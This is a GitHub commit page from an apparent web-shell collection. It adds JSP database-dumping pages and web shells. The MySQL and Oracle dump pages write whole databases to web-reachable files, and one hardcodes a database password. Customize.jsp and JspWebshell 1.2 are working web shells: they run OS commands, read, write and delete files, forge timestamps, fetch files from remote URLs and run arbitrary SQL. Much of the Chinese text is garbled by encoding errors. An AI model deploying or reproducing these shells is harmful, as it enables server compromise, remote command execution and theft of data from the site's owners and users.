PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Code Issues Projects Releases Wiki Activity

update jsp

Browse Source
This commit is contained in:
tennc
2013-07-22 08:59:10 +08:00
parent e3ca3b3df7
commit 6faad041a0
29 changed files with 13147 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

89
drag/mysql_jsp脱裤.txt Normal file
View File

@@ -0,0 +1,89 @@
<%@ page import="java.sql.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.io.*" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%
try {
//±¸·ގļ<DE8E>ľ<EFBFBD>¾¶
String backupDir = "/home/tomcat-oa/webapps/ROOT/video/ab1/";
String ex=".txt";
String driver = "com.mysql.jdbc.Driver";
String url = "jdbc:mysql://localhost:3306/oa";
String username = "oa";
String password = "LOa2(2.DX,v>15^td8nWe!L";
Class.forName(driver);
Connection conn = DriverManager.getConnection(url, username, password);
// Get tables
DatabaseMetaData dmd = conn.getMetaData();
ResultSet rs = dmd.getTables(null, null, "%", null);
ArrayList<String> tables = new ArrayList<String>();
while (rs.next()) {
tables.add(rs.getString(3));
}
rs.close();
ResultSetMetaData rsmd = null;
Statement stmt = conn.createStatement();
for (String table : tables) {
rs = stmt.executeQuery("SHOW CREATE TABLE " + table);
rsmd = rs.getMetaData();
while (rs.next()) {
/*
* mysql> SHOW CREATE TABLE t\G
*************************** 1. row ***************************
* Table: t
* Create Table: CREATE TABLE t (
* id int(11) default NULL auto_increment,
* s char(60) default NULL,
* PRIMARY KEY (id)
* ) TYPE=MyISAM
*/
// JDBC is 1-based, Java is not !?
// osw.append(rs.getString(2) + "\n\n");
}
rs.close();
out.println("Dumping data for table " + table + "...<br />");
OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir+table+ex), "UTF-8");
BufferedWriter bw=new BufferedWriter(osw);
rs = stmt.executeQuery("SELECT * FROM " + table);
rsmd = rs.getMetaData();
while (rs.next()) {
bw.append("INSERT INTO " + table + " VALUES(");
// JDBC is 1-based, Java is not !?
for (int col = 1; col <= rsmd.getColumnCount(); col++) {
bw.append("'");
if (rs.getString(col) == null)
bw.append("");
else
bw.append(rs.getString(col));
if (col == rsmd.getColumnCount())
bw.append("'");
else
bw.append("',");
}
bw.append(");");
bw.newLine();
}
bw.flush();
bw.close();
osw.close();
rs.close();
}
stmt.close();
out.println("backup is ok");
conn.close();
} catch (Exception e) {
response.setStatus(200);
e.printStackTrace();
}
out.println("<p><h3>finished</h3></p>");
%>

321
drag/oracle_jsp脱裤.txt Normal file
View File

@@ -0,0 +1,321 @@
<%@ page language="java" import="java.util.*" pageEncoding="GBK"%>
<%@ page import="oracle.jdbc.*"%>
<%@ page import="java.sql.*" %>
<%@ page contentType="text/html; charset=GBK" %>
<%@ page import="java.io.*" %>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<base href="<%=basePath%>">
<title>XXOO</title>
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
<meta http-equiv="description" content="This is my page">
<!--
<link rel="stylesheet" type="text/css" href="styles.css" mce_href="styles.css">
-->
</head>
<body>
<%
String url = "http://" + request.getServerName() + ":" + request.getServerPort() + request.getContextPath()+request.getServletPath();
Class.forName("oracle.jdbc.driver.OracleDriver").newInstance();
ResultSet rs=null;
ResultSet rs_column=null;
ResultSet rs_dump=null;
String oraUrl="jdbc:oracle:thin:@192.168.1.81:1521:db";
String oraUser="username";
String oraPWD="password";
int size=30000;
try
{
DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver());
}
catch (SQLException e){
out.print("filed!!");
}
try
{
Connection conn=DriverManager.getConnection(oraUrl,oraUser,oraPWD);
conn.setAutoCommit(false);
if (request.getParameter("table") == null || request.getParameter("table").equals(""))
{
out.print("xixi...<br>");
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
rs=stmt.executeQuery("select table_name from all_tables");
while(rs.next())
{
out.print("<a href=");out.print(url);out.print("?table=");out.print(rs.getString(1));
out.print(" target=_blank>");out.print(rs.getString(1));out.print("</a><br>");
}
rs.close();
stmt.close();
}
else
{
out.print("Current table : "+request.getParameter("table"));
String sql_count="select count(*) from all_tab_columns where Table_Name='"+request.getParameter("table")+"'";
String sql_column="select * from all_tab_columns where Table_Name='"+request.getParameter("table")+"'";
String sql_columns_count="select count(*) from "+request.getParameter("table");
//String sql_dump="select rownom ro,* from T_SYS_USER";
Statement stmt_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
Statement stmt_column=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
Statement stmt_columns_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
rs=stmt_count.executeQuery(sql_count);
rs_column=stmt_column.executeQuery(sql_column);
ResultSet rs_columns_count=null;
rs_columns_count=stmt_columns_count.executeQuery(sql_columns_count);
conn.commit();
int count=0;
while(rs.next())
{
count=Integer.parseInt(rs.getString(1));
//out.print(count);
}
int columns_count=0;
while(rs_columns_count.next()) // Total number of records
{
columns_count=Integer.parseInt(rs_columns_count.getString(1));
out.print("<br>The number of records : "+columns_count+"<br>");
}
//out.print(columns_count);
int column_num=1;
//out.print("<table border='1'>");out.print("<tr>");
String sql_dump="select * from (select rownum ro "; //SELECT
while(rs_column.next())
{
//out.print(rs_column.getString(3));out.print("\r");
sql_dump+=",";
sql_dump+=rs_column.getString(3);
column_num+=1;
}
rs_column.close();
rs.close(); //close
stmt_count.close();
stmt_column.close();
sql_dump+=" from "+request.getParameter("table")+" where rownum<=";
int mark=0;
mark=columns_count;
out.print("<br><br><br>Please download:<br>");
while(true)
{
if(mark<=size) //one txt count
{ mark=0; }
else
{ mark=mark-size; }
String dump=sql_dump+columns_count+") where ro>="+mark;
columns_count-=size;
Statement stmt_dump=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
rs_dump= stmt_dump.executeQuery(dump);
conn.commit();
String filename = request.getRealPath(request.getParameter("table")+"-"+mark+".txt");
java.io.File f = new java.io.File(filename);
if(!f.exists())
{ f.createNewFile(); }
try
{
PrintWriter pw = new PrintWriter(new FileOutputStream(filename));
while(rs_dump.next())
{
column_num=1;
while(column_num<=count)
{
pw.print(rs_dump.getString(column_num));
pw.print(",");
column_num+=1;
}
pw.println("");
}
pw.close();
}
catch(IOException e) {
out.println(e.getMessage());
}
out.println("<br><a href=./"+request.getParameter("table")+"-"+mark+".txt>"+request.getParameter("table")+"-"+mark+".txt</a><br>");
if(mark==0)
{
rs_dump.close();
stmt_dump.close();
break;
}
}
}
conn.close();
} catch (SQLException e)
{
System.out.println(e.toString());
out.print(e.toString());
}
%>
</body>
</html>

59
jsp/hackk8/JSP/Customize.jsp Normal file
View File

@@ -0,0 +1,59 @@
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="k8";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>

BIN
jsp/hackk8/JSP/JSP无组件实现WEB上传.rar Normal file
View File

Binary file not shown.

125
jsp/hackk8/JSP/Java Shell.jsp Normal file
View File

@@ -0,0 +1,125 @@
package enigma.shells.jython;
import java.io.*;
import java.awt.*;
import javax.swing.*;
import enigma.console.*;
import enigma.console.java2d.*;
import org.python.core.*;
import org.python.util.*;
public class JythonShell extends JPanel implements Runnable {
public static int DEFAULT_ROWS = 20;
public static int DEFAULT_COLUMNS = 80;
public static int DEFAULT_SCROLLBACK = 100;
public PrintStream out;
public Console console;
public Java2DTextWindow text;
public JScrollPane scrollPane;
public PythonInterpreter interp;
private Color colorBackground = new Color(0, 0, 0);
private Color colorForeground = new Color(187, 187, 187);
private Color colorError = new Color(187, 0, 0);
private Color colorCursor = new Color(187, 187, 0);
public JythonShell() {
this(null, Py.getSystemState());
}
public JythonShell(PyObject dict) {
this(dict, Py.getSystemState());
}
public JythonShell(int columns, int rows, int scrollback) {
this(null, Py.getSystemState(), columns, rows, scrollback);
}
public JythonShell(PyObject dict, PySystemState systemState) {
this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
}
public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
super(new BorderLayout());
text = new Java2DTextWindow(columns, rows, scrollback);
text.setBackground(colorBackground);
scrollPane = new JScrollPane();
scrollPane.setViewportView(text);
add(scrollPane, BorderLayout.CENTER);
console = new DefaultConsoleImpl(text);
out = console.getOutputStream();
interp = new PythonInterpreter(dict, systemState);
interp.setOut(out);
interp.setErr(out);
}
public void run() {
int pos = 0;
int tbs = 4;
String line = "";
String command = "";
for (;;) {
String space = "";
for (int i = 0; i < pos * tbs; i++) {
space += " ";
}
try {
console.setTextAttributes(new TextAttributes(colorCursor));
if (pos > 0) {
out.print(space + "... ");
} else {
out.print(">> ");
}
console.setTextAttributes(new TextAttributes(colorForeground));
line = console.readLine().trim();
if (line.length() == 0 && pos > 0) {
pos--;
} else if (line.endsWith(":")) {
command += space + line + "\n";
pos++;
} else {
command += space + line + "\n";
}
if (pos == 0) {
interp.exec(command);
command = "";
}
} catch (Exception e) {
console.setTextAttributes(new TextAttributes(colorError));
e.printStackTrace();
command = "";
}
}
}
public static void main(String[] argv) {
PySystemState.initialize(System.getProperties(), null, argv);
JFrame frame = new JFrame("Jython Console");
JythonShell console = new JythonShell();
frame.add(console, BorderLayout.CENTER);
frame.pack();
frame.setVisible(true);
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
console.run();
}
}

788
jsp/hackk8/JSP/JspWebshell 1.2.jsp Normal file
View File

@@ -0,0 +1,788 @@
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* <p>Title:JspWebshell </p>
*
* <p>Description: jsp<73><70>վ<EFBFBD><D5BE><EFBFBD><EFBFBD></p>
*
* <p>Copyright:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
* PS:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С<EFBFBD>ܴ<EFBFBD><DCB4><EFBFBD><EFBFBD><EFBFBD>Ȥ<EFBFBD><C8A4>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵQQ:48124012
* @version 1.2
*/
String path="";
String selfName="";
boolean copyfinish=false;
%>
<% selfName=request.getRequestURI();
// String editfile="";
String editfile=request.getParameter("editfile");
if (editfile!=null)
{editfile=new String(editfile.getBytes("ISO8859_1"));
}
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
%>
<%!
String _password ="111";//<2F><><EFBFBD><EFBFBD>
public String readAllFile(String filePathName) throws IOException
{
FileReader fr = new FileReader(filePathName);
int count = fr.read();
String res="";
while(count != -1)
{
//System.out.print((char)count);
res=res+(char)count;
count = fr.read();
if(count == 13)
{
fr.skip(1);
}
}
fr.close();
return res;
}
public void writeFile(String filePathName,String args) throws IOException
{
FileWriter fw = new FileWriter(filePathName);
PrintWriter out=new PrintWriter(fw);
out.write(args);
out.println();
out.flush();
fw.close();
out.close();
}
public boolean createFile(String filePathName) throws IOException
{
boolean result = false;
File file = new File(filePathName);
if(file.exists())
{
System.out.println("<22>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>ڣ<EFBFBD>");
}
else
{
file.createNewFile();
result = true;
System.out.println("<22>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
}
return result;
}
public boolean createFolder(String fileFolderName)
{
boolean result = false;
try
{
File file = new File(fileFolderName);
if(file.exists())
{
//file.delete();
System.out.println("Ŀ¼<C4BF>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD>!");
result = true;
}
else
{
file.mkdir();
System.out.println("Ŀ¼<C4BF>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD>!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean DeleteFolder(String filefolderName)
{
boolean result = false;
try
{
File file = new File(filefolderName);
if(file.exists())
{
file.delete();
System.out.println("Ŀ¼<C4BF><C2BC>ɾ<EFBFBD><C9BE>!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean validate(String password) {
if (password.equals(_password)) {
return true;
} else {
return false;
}
}
public String HTMLEncode(String str) {
str = str.replaceAll(" ", "&nbsp;");
str = str.replaceAll("<", "&lt;");
str = str.replaceAll(">", "&gt;");
str = str.replaceAll("\r\n", "<br>");
return str;
}
public String exeCmd(String cmd) {
Runtime runtime = Runtime.getRuntime();
Process proc = null;
String retStr = "";
InputStreamReader insReader = null;
char[] tmpBuffer = new char[1024];
int nRet = 0;
try {
proc = runtime.exec(cmd);
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
retStr += new String(tmpBuffer, 0, nRet);
}
insReader.close();
retStr = HTMLEncode(retStr);
} catch (Exception e) {
retStr = "<font color=\"red\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\"" + cmd + "\"";
} finally {
return retStr;
}
}
public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;
try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
out.write(buffer, 0, nBytes);
}
in.close();
out.close();
} catch (IOException e) {
bRet = false;
}
return bRet;
}
class EnvServlet
{
public long timeUse=0;
public Hashtable htParam=new Hashtable();
private Hashtable htShowMsg=new Hashtable();
public void setHashtable()
{
Properties me=System.getProperties();
Enumeration em=me.propertyNames();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=me.getProperty(strKey);
htParam.put(strKey,strValue);
}
}
public void getHashtable(String strQuery)
{
Enumeration em=htParam.keys();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=new String();
if(strKey.indexOf(strQuery,0)>=0)
{
strValue=(String)htParam.get(strKey);
htShowMsg.put(strKey,strValue);
}
}
}
public String queryHashtable(String strKey)
{
strKey=(String)htParam.get(strKey);
return strKey;
}
/* public long test_int()
{
long timeStart = System.currentTimeMillis();
int i=0;
while(i<3000000)i++;
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}
public long test_sqrt()
{
long timeStart = System.currentTimeMillis();
int i=0;
double db=(double)new Random().nextInt(1000);
while(i<200000){db=Math.sqrt(db);i++;}
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}*/
}
%>
<%
EnvServlet env=new EnvServlet();
env.setHashtable();
//String action=new String(" ");
//String act=new String("action");
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>JspWebShell By <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></title>
<style>
body {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
background-color: #666666;
}
A {
COLOR: black; TEXT-DECORATION: none
}
A:hover {
COLOR: black; TEXT-DECORATION: underline; none:
}
td {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
color: #000000;
}
input.textbox {
border: black solid 1;
font-size: 12px;
height: 18px;
}
input.button {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
border: black solid 1;
}
td.datarows {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
height: 25px;
color: #000000;
}
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
textarea {
border: black solid 1;
}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body bgcolor="#666666">
<%
//session.setMaxInactiveInterval(_sessionOutTime * 60);
String password=request.getParameter("password");
if (password == null && session.getAttribute("password") == null) {
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
<tr>
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
<tr>
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
version 1.2<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>¼ :::...</b></font></TD>
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></FONT></TD>
</tr>
<form name="bctform" method="post">
<tr bgcolor="#999999">
<td height="30" colspan="2" align="center" class="td2">
<input name="password" type="password" class="textbox" id="Textbox" />
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
</td>
</tr>
</form>
</TABLE></td>
</tr>
</TABLE>
</div>
<%
} else {
if (session.getAttribute("password") == null) {
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
%>
<%
File tmpFile = null;
String delfile="";
String delfile1="";
String editpath="";
delfile1=request.getParameter("delfile");
editpath=request.getParameter("filepath");
if (delfile1!=null)
{delfile=new String(delfile1.getBytes("ISO8859_1"));
}
if ( delfile1!= null) {
// out.print(delfile);
tmpFile = new File(delfile);
if (! tmpFile.delete()) {
out.print( "<font color=\"red\">ɾ<><C9BE>ʧ<EFBFBD><CAA7></font><br>\n");
}
}
%>
<%String editfilecontent=null;
String editfilecontent1=request.getParameter("content");
// out.println(editfilecontent1);
//String save=request.getParameter("save");
if (editfilecontent1!=null)
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
// out.print(editfile);
//out.print(editfilecontent);
if (editfile!=null&editfilecontent!=null)
{try {writeFile(editfile,editfilecontent);}
catch (Exception e) {out.print("д<><D0B4>ʧ<EFBFBD><CAA7>");}
out.print("д<><D0B4><EFBFBD>ɹ<EFBFBD>");
}
%>
<%request.setCharacterEncoding("GBK");%>
<%//String editfile=request.getParameter("editfile");
//out.print(editfile);
if (request.getParameter("jsptz")!=null)
{%>
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
<CENTER>
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ز<EFBFBD><D8B2><EFBFBD></strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#999999" height="22">
<td width="130" bgcolor="#999999">&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
<%=env.queryHashtable("sun.os.patch.level")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD></td>
<td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳģʽ</td>
<td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>λ</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD><DAB5><EFBFBD></td>
<td>&nbsp;<%=env.queryHashtable("user.country")%></td>
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td>&nbsp;<%=env.queryHashtable("user.language")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1></td>
<td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1></td>
<td>&nbsp;<%=new java.util.Date()%> </td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
<td width="130">&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD></td>
<td width="170">&nbsp;<%= request.getServerPort() %></td>
</tr>
<tr bgcolor="#999999" height="22">
